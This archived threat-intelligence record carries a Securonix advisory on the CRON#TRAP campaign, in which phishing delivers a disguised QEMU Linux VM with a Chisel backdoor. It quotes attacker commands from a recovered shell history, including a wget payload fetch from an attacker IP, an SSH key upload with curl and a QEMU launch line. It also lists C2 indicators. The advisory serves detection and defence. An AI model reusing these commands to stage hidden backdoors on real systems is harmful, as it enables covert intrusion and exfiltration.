{
	"id": "2600c996-e96f-4088-9a17-85122b82fbc8",
	"created_at": "2026-04-06T00:21:52.849795Z",
	"updated_at": "2026-04-10T03:24:18.039327Z",
	"deleted_at": null,
	"sha1_hash": "77466b25b3aacea9c971befea5c085e94ab411a8",
	"title": "CRON#TRAP: Emulated Linux Environments as the Latest Tactic in Malware Staging",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1432264,
	"plain_text": "CRON#TRAP: Emulated Linux Environments as the Latest Tactic\r\nin Malware Staging\r\nArchived: 2026-04-05 13:20:16 UTC\r\nSecuronix Threat Research Security Advisory\r\nBy Securonix Threat Research: Den Iuzvyk, Tim Peck\r\nNov 4, 2024\r\ntldr:\r\nIn a rather novel attack chain, attackers deploy a custom-made emulated QEMU Linux box to persist on\r\nendpoints, delivered through phishing emails.\r\nThe Securonix Threat Research team has been tracking an intriguing attack campaign that leverages a malicious\r\nshortcut (.lnk) file. When executed, this file extracts and initiates a lightweight, custom Linux environment\r\nemulated through QEMU.\r\nWhat makes the CRON#TRAP campaign particularly concerning is that the emulated Linux instance comes pre-configured with a backdoor that automatically connects to an attacker-controlled Command and Control (C2)\r\nserver. This setup allows the attacker to maintain a stealthy presence on the victim’s machine, staging further\r\nmalicious activity within a concealed environment, making detection challenging for traditional antivirus\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 1 of 13\n\nsolutions. Since QEMU is legitimate software, often used in development and research, its presence typically\r\nwon’t trigger any security alarms.\r\nWe were unfortunately not able to establish confident attribution or victimology with this campaign. However,\r\nbased on sample telemetry, most sources appeared to originate from the US and Europe. Additionally, based on the\r\nverbiage used throughout the campaign and considering the command and control servers were located within the\r\nUnited States, allowing us to suggest with low to medium confidence that North America may have been a\r\nprimary target.\r\nBefore we get ahead of ourselves, let’s back it up a little bit. 
So what is QEMU and how can it be used\r\nmaliciously?\r\nIn a nutshell, QEMU (Quick Emulator) is a legitimate, open-source virtualization tool that allows for emulating\r\nvarious hardware and processor architectures, enabling them to run different operating systems or applications in a\r\nvirtualized environment. It can simulate processors like x86, ARM, and PowerPC, making it versatile for testing,\r\ndevelopment, and research. In the case of the CRON#TRAP campaign, the attackers opted to emulate a Linux\r\ninstallation of Tiny Core Linux. As far as we can determine, this is the first time that this tool has been used by\r\nattackers for malicious purposes outside of Cryptomining.\r\nInitial infection\r\nWhile our team was not able to derive the original source of the attack, we believe that the attack began with a\r\nphishing email which contained a link to download a zip file. The theme appears to be survey-related.\r\nTaking a quick look at the zip file, it is absolutely massive for a phishing document. The file stands at an\r\nimpressive 285MB which could raise suspicions to some users. When the user extracts the archive, they’re\r\npresented with a single file (shortcut) and a “data” directory containing the entire QEMU installation directory.\r\nThe entirety of the data folder’s contents have the hidden attribute applied, so unless the user has the “view hidden\r\nfiles” Explorer option enabled, they won’t see any contained contents.\r\nTaking a look at the shortcut file, it appears to link to the system’s PowerShell process and executes a simple\r\ncommand. The command takes the downloaded zip file and (re)extracts its contents into the user’s profile\r\ndirectory into a directory called “datax”. It then executes start.bat contained at:\r\n“$home\\datax\\data\\start.bat”\r\nThe batch file start.bat accomplishes two tasks. 
First, it uses explorer.exe to display a “server error” to the user\r\nimplying that the link or URL to the survey was somehow broken on the server-side. The user at this point would\r\nprobably dismiss the error. The entirety of the start.bat code can be seen in the image below. Second, the script\r\nexecutes the QEMU process and command line to start the emulated Linux environment. The process qemu.exe\r\nwas renamed to fontdiag.exe by the attacker prior to delivery of the phishing lure.\r\nFigure 1: contents of start.bat\r\nLure document\r\nThe image is opened by the explorer.exe process. Since the image is hosted on a remote server via HTTPS, the\r\nuser’s default browser would open and display the image. The image is a simple server error message. While there\r\nis technically no error, rather an image of the error, the attackers would hope this would be glanced over by the\r\nuser. The image was hosted on a public site:\r\nhxxps://forum.hestiacp[.]com/uploads/default/original/2X/9/9aae76309a614c85f880512d8fe7df158fec52cc.png\r\nFigure 2: Lure image (masquerading as a server error)\r\nQEMU: Mount and execute\r\nAs mentioned earlier, the QEMU process was renamed and executed using the start.bat script. This QEMU\r\nprocess is the legitimate process and is digitally signed using a valid digital certificate. The Linux box was\r\nexecuted using the following command:\r\nSTART /B %HOMEPATH%\\datax\\data\\fontdiag.exe -drive file=%HOMEPATH%\\datax\\data\\tc.img -nographic \u0026\r\nThe use of the “-nographic” parameter means that the Linux virtual environment will run silently in the\r\nbackground. For the sake of analysis, we removed this to interact with the OS. 
Fortunately, although we don’t know the\r\nuser’s password, auto login was enabled! At this stage, we can interact with the OS.\r\nPivotBox: Exploring the attacker’s Linux environment\r\nAs seen in the image below, the MOTD banner displays “PivotBox” as well as an options command. These appear\r\nto be custom-set by the attacker as we witnessed many edits to /etc/motd and the user’s .ashrc file (see history\r\nsection below). This file is the user’s profile configuration for the Almquist Shell (often referred to as ash), a\r\nlightweight shell commonly used in Unix-like operating systems.\r\nThe options command yielded two “special commands”, get-host-shell and get-host-user, which allow for\r\ninteracting with the host.\r\nFigure 3: Screenshot of “PivotBox” – custom Tiny Core Linux QEMU instance\r\nThe get-host-shell alias created by the attacker attempts to spawn an interactive shell on the host machine by\r\ninitiating an SSH connection. The command uses information stored in a QEMU-specific\r\nfile, /sys/firmware/qemu_fw_cfg/by_name/opt/usercontext/raw, which contains user context information.\r\nThe command points to IP 10.0.2.2, a common IP for host-guest communication in virtualized environments,\r\nwhich serves as an alias to the host’s loopback interface.\r\nThe get-host-user alias fetches and displays the username or context that the QEMU instance is running under\r\non the host by reading from usercontext/raw.\r\nExploring PivotBox’s command history\r\nLinux by default will store a record of all commands executed by the user inside the user’s profile directory. As\r\nthe ash shell was used, we were fortunate to find that we had obtained a command record of the creation of the\r\nPivotBox Linux image. 
Typically good OPSEC (operational security) would entail clearing the history, especially\r\nif the image would be deployed elsewhere. We’re not sure if this was a lapse in the attacker’s workflow, or if they\r\njust didn’t care.\r\nFigure 4: Screenshot of a portion of the attacker’s .ash_history file\r\nWhile there’s a lot to unpack, let’s take a look at some of the highlights that we discovered. The .ash_history file\r\nprovided us with a series of steps that suggest an advanced attempt at persistence by creating this stealthy toolkit\r\nwithin its own environment. Here’s a breakdown of the key actions:\r\nNetwork Testing \u0026 Initial Reconnaissance\r\nCommands: ping google.com and wget\r\nPurpose: Confirm network connectivity and attempt to fetch remote resources (likely staging or payload files)\r\nfrom both IP-based URLs (192.168.160.143) and GitHub-hosted content. The private 192 address would appear to\r\nbe from the attacker’s testing infrastructure.\r\nTool Installation and Preparation\r\nCommands: tce-load -wi [tool]\r\nPurpose: This Tiny Core Linux (tce) command installs tools such as vim, file, and openssh, indicating the\r\nattacker is preparing the environment for modifications, file analysis, and SSH access.\r\nImplication: The installation of openssh hints at establishing persistent remote access.\r\nPayload Manipulation and Execution\r\nCommands: ./crondx, chmod +x crondx, ln -s /lib /lib64\r\nPurpose: Execution of crondx, potentially after renaming or replacing files downloaded from the attacker’s server\r\nor GitHub repositories. 
Linking /lib to /lib64 suggests an attempt to bypass environment dependencies.\r\nObservations:\r\nwget http://192.168.160.143:8000/crondx downloads a file to be used as crondx, later executed multiple\r\ntimes with variations (./crondx, /bin/bash ./crondx).\r\nRegular use of file analysis (file crondx) indicates testing or validation of each download.\r\nConfiguration Persistence and Privilege Escalation\r\nCommands: sudo vim /opt/bootlocal.sh, filetool.sh -b\r\nPurpose: Editing /opt/bootlocal.sh is used to persist changes across reboots. Using filetool.sh -b is a method\r\nto save changes in Tiny Core Linux’s file structure, ensuring that any modifications to system configuration are\r\nretained.\r\nPersistence: By modifying and backing up configurations, it ensures that crondx will be reloaded or re-executed\r\non each start of the QEMU instance.\r\nSSH Key Manipulation for Remote Access\r\nCommands: ssh-keygen -t rsa, curl --upload-file ~/.ssh/id_rsa.pub\r\nPurpose: By generating an SSH key and uploading the public key, the attacker aims to access the target machine\r\nwithout a password.\r\nImplication: This is a classic persistence technique, allowing re-entry into the environment by using SSH keys\r\nuploaded to a known location.\r\nFile and Environment Management\r\nCommands: tce-load -i 7z, unzip, 7z x [archive.zip]\r\nPurpose: Frequent use of archive tools shows a method for handling large file transfers or additional payloads\r\nwhile maintaining an organized working environment.\r\nThe repeated downloads and extractions of files (such as resolvd.zip, ch.zip) likely contain supplementary\r\npayloads or configurations.\r\nSystem and User Enumeration\r\nCommands: get-host-user, uname -a, df, ls -hal\r\nPurpose: Basic reconnaissance to understand the environment, identify user information, and confirm file\r\nlocations.\r\n
Implication: This allows the attacker to adjust actions based on system architecture or available space, tailoring\r\ncommands to the target.\r\nPotential Exfiltration or Command and Control Channels\r\nCommands: wget hxxps://free[.]keep.sh\r\nPurpose: Using a free file-sharing service could serve as an exfiltration channel for SSH keys or other sensitive\r\nfiles.\r\nSummary of the command history:\r\nLike a game of chess, the attackers prepped their environment with a strategy in mind. They systematically\r\ninstalled, tested, and executed multiple payloads and configurations, each preparing for the next phase. The use of\r\nbootlocal.sh and SSH keys indicates they’re aiming for a reliable presence on the machine. There were several\r\ntimes where they downloaded crondx files from various URLs. The reasons for this are unknown; however, we\r\nspeculate that they could have been modifying the payload until it functioned as expected.\r\nAnalysis of crondx (Chisel)\r\nThe binary file that gets executed at the startup of the Linux QEMU instance is located at /home/tc/crondx. The\r\nfile is a 64-bit ELF executable compiled in Go (golang). Some of the high level details can be found below.\r\nFigure 5: File overview of crondx\r\nUpon closer inspection, the binary appears to be a pre-configured Chisel client designed to connect to a remote\r\nCommand and Control (C2) server at 18.208.230[.]174 via websockets. Typically, a Chisel client requires\r\ncommand-line parameters to specify modes (client or server) and connection details. In this case, however, the\r\nattackers opted to hard-code these parameters directly into the binary, removing the need for external\r\nconfiguration. 
This customization is straightforward due to Chisel’s open-source nature and allows the binary to\r\nexecute with minimal visibility, making detection more challenging.\r\nAccording to Chisel’s GitHub, it is “…a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single\r\nexecutable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through\r\nfirewalls, though it can also be used to provide a secure endpoint into your network.” Chisel’s design makes it\r\nparticularly effective for creating covert communication channels and tunneling through firewalls, often under the\r\nradar of network monitoring tools.\r\nThe attackers’ approach effectively transforms this Chisel client into a full backdoor, enabling remote command\r\nand control traffic to flow in and out of the Linux environment. This setup provides them with persistent,\r\nencrypted access to the compromised system that would allow them to manage additional payloads or exfiltrate\r\ndata at will.\r\nWrapping up…\r\nThe CRON#TRAP campaign demonstrates a sophisticated and novel approach to compromising systems through\r\na combination of phishing, emulated environments, and stealthy pre-configured tunneling. What makes this\r\ncampaign so interesting is the fact that it begins with a rather standard sequence of events, a phishing lure, leading\r\nto the download of a large zip file containing a malicious .lnk shortcut. However, things take a dramatic turn once\r\ncode execution begins. PowerShell is used to kick off a chain of events that lead to the starting of an entire\r\nemulated Linux environment using a disguised QEMU executable. This emulated Linux environment enables the\r\nattacker to operate outside the visibility of traditional antivirus solutions.\r\nWithin this environment, a highly customized setup unfolds. The emulated system includes a crondx (Chisel)\r\nbinary, a tunneling tool commonly used for passing data covertly through firewalls. 
The Chisel client is pre-configured with hard-coded parameters, allowing it to connect automatically to a remote Command and Control\r\n(C2) server via websockets, providing attackers with a persistent backdoor into the environment.\r\nThe attacker’s presence in the emulated Linux system is further reinforced by various persistence techniques.\r\nThrough modifications in startup scripts and the use of SSH keys, they ensure continued access even after reboots.\r\nCommand aliases, such as get-host-shell and get-host-user, allow them to interact directly with the host\r\nmachine from within the isolated QEMU environment, a feature likely intended to facilitate lateral movement or\r\ndata exfiltration.\r\nThe .ash_history file reveals a trail of actions taken to install tools, gather system information, and download\r\nadditional payloads, showcasing a modular and adaptive attack method. The attacker’s reliance on legitimate\r\nsoftware like QEMU and Chisel adds an additional layer of evasion, as these tools are unlikely to trigger alerts in\r\nmany environments.\r\nSecuronix recommendations\r\nAs this campaign likely started using phishing emails, avoid downloading files or attachments from\r\nexternal sources, especially if the source was unsolicited. Common file types include zip, rar, iso, and pdf.\r\nAdditionally, external links to download these kinds of files should be considered equally dangerous. Zip\r\nfiles, sometimes password-protected, were used during this campaign.\r\nMonitor common malware staging directories, especially script-related activity in world-writable\r\ndirectories. 
In the case of this campaign, the threat actors staged their QEMU instance from the user’s home\r\ndirectory at: %HOME%\\datax.\r\nMonitor for the use of legitimate software being executed from unusual locations.\r\nWe strongly recommend deploying robust endpoint logging capabilities to aid in PowerShell detections.\r\nThis includes leveraging additional process-level logging such as Sysmon and PowerShell logging for\r\nadditional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix hunting queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactics Techniques\r\nInitial Access T1566.001: Phishing: Spearphishing Attachment\r\nCommand and Control\r\nT1071.001: Application Layer Protocol: Web Protocols\r\nT1132: Data Encoding\r\nT1572: Protocol Tunneling\r\nDefense Evasion\r\nT1027: Obfuscated Files or Information\r\nT1036: Masquerading\r\nT1218: System Binary Proxy Execution\r\nT1564.006: Hide Artifacts: Run Virtual Instance\r\nExecution\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1204.001: User Execution: Malicious Link\r\nT1204.002: User Execution: Malicious File\r\nPersistence T1072: Software Deployment Tools\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nRelevant hunting queries\r\n(remove square brackets “[ ]” for IP addresses or URLs)\r\nindex = activity AND rg_functionality = “Next Generation Firewall” AND destinationaddress =\r\n“18.208.230[.]174”\r\nindex = activity AND rg_functionality = “Next Generation Firewall” AND destinationhostname\r\nCONTAINS\r\n“forum.hestiacp[.]com/uploads/default/original/2X/9/9aae76309a614c85f880512d8fe7df158fec52cc.png”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “File\r\ncreated” OR deviceaction = “File created (rule: 
FileCreate)”) AND customstring49 ENDS WITH\r\n“\\\\datax\\\\data\\\\fontdiag.exe”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process\r\nCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2”\r\nOR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”)\r\nAND customstring48 = “QEMU machine emulators and tools” AND customstring54 NOT CONTAINS\r\n“\\\\Program Files”\r\nC2 and infrastructure\r\nC2 Address\r\n18.208.230[.]174\r\ngithub[.]com/yaniraenrica/testing/raw/main/resolvd.zip\r\ngithub[.]com/rustyshackleford72/testing/raw/main/cheezel-client\r\ngithub[.]com/gregtunny/data/raw/refs/heads/main/ch.zip\r\nforum.hestiacp[.]com/uploads/default/original/2X/9/9aae76309a614c85f880512d8fe7df158fec52cc.png\r\nReferences:\r\n1. LoudMiner: Cross-platform mining in cracked VST software\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nAnalyzed 
files/hashes\r\nSHA256\r\nCE26AAC9BA7BE60BFB998BA6ADD6B34DA5A68506E9FEA9844DC44BAFE3CAB676\r\n0618BB997462F350BC4402C1A5656B38BEDC278455823AC249FD5119868D3DF4\r\n9FFAD9CF6D93B21BB0CA15DE9AB9E782E78F2B6356D05FB55FB95F55BEC9FC04\r\n002f9cd9ffa4b81301d003acd9fb3fbba1262e593b4f2e56a085b62a50e76510\r\n5A8BC06587CE40B3A8D8DD4037D0EF272EFC64A69E21F6689FFE3F5FBB04A468\r\n4C91070877C6D116F5A27EFADDBBFBC339455628E9D6585A4EA5F9B6972BF92B\r\nBC7A34379602F9F061BDB94EC65E8E46DA0257D511022A17D2555ADBD4B1DD38\r\n3E6A47DA0A226A4C98FB53A06EC1894B4BFD15E73D0CEA856B7D2A001CADA7E9\r\n9A33EA831EDF83CB8775311963F52299F1488A89651BD3471CC8F1C70F08A36C\r\n82A9747485FDD60360D28CD73671F171A8312B7D68B26FE1E2D472EB97C4FE59\r\nF4229128EF642D299F7AB5FBCB6DE75A17D12F30F22A3985044C8B1B44F1768F\r\n6903BDF7F4A22ECFDDBAEE0B16E3DEE85DBB169AA446094BB3D1B75526677B6C\r\nSource: https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/"
	],
	"report_names": [
		"crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434912,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/77466b25b3aacea9c971befea5c085e94ab411a8.pdf",
		"text": "https://archive.orkl.eu/77466b25b3aacea9c971befea5c085e94ab411a8.txt",
		"img": "https://archive.orkl.eu/77466b25b3aacea9c971befea5c085e94ab411a8.jpg"
	}
}